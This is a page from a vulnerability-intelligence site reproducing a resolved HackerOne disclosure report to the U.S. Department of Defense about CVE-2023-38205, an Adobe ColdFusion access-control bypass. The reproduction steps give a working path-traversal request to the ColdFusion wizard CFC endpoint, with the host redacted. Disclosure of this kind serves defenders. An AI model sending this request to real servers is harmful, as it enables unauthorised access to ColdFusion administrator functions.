Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Adobe ColdFusion - Access Control Bypass [CVE-2023-38205] at ██████

High
U
U.S. Dept Of Defense
Submitted None
Actions:
View on HackerOne
Reported by mega7

Vulnerability Details

Technical details and impact analysis

Improper Access Control - Generic
Hello Gents, I would like to report an issue where attackers are able to bypass the product feature that restricts external access to the ColdFusion Administrator. [CVE-2023-38205] at `██████` ## Steps to reproduce + Please open the following link: > https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx ## Proof of concept + ████ ## Impact Access Control Bypass. Thanks and have a nice day! ## System Host(s) ██████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce + Please open the following link: > https://████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx ## Suggested Mitigation/Remediation Actions

Related CVEs

Associated Common Vulnerabilities and Exposures

CVE-2023-38205 HIGH

Adobe ColdFusion versions 2018u18 (and earlier), 2021u8 (and earlier) and 2023u2 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require …

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Improper Access Control - Generic